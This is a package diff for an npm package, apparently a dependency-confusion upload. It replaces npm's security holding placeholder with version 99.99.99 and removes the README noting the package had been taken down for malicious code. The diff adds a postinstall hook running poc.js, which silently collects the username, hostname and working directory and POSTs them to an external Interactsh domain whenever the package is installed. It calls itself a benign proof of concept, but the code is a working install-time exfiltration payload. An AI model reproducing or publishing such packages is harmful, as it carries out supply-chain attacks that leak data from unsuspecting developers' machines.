@emersonecologics/emerson-angular-trove 0.0.1-security → 99.99.99

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "@emersonecologics/emerson-angular-trove",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "99.99.99",
+  "description": "Proof of concept for dependency confusion. This is a benign package for security research.",
+  "main": "poc.js",
+  "scripts": {
+    "postinstall": "node poc.js"
+  },
+  "author": "rodriguezjorgex",
+  "license": "ISC"
 }

package/poc.js

@@ -0,0 +1,37 @@
+const https = require('https');
+const os = require('os');
+
+// Replace with your unique Interactsh domain
+const interactshDomain = 'hkcjnwknxqsasidovxmgnrqu6wvahfjiu.oast.fun';
+
+// Gather some harmless system information
+const data = {
+  username: os.userInfo().username,
+  hostname: os.hostname(),
+  cwd: process.cwd(),
+  package: 'emerson-angular-trove' // Optional: remind yourself which package was triggered
+};
+
+const payload = JSON.stringify(data);
+
+const options = {
+  hostname: `${os.hostname()}.${interactshDomain}`, // Send data as a subdomain for easy identification
+  port: 443,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': payload.length
+  }
+};
+
+try {
+  const req = https.request(options);
+  req.on('error', (e) => {
+    // Fails silently if the request has an error
+  });
+  req.write(payload);
+  req.end();
+} catch (e) {
+  // Fails silently
+}

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40emersonecologics%2Femerson-angular-trove for more information.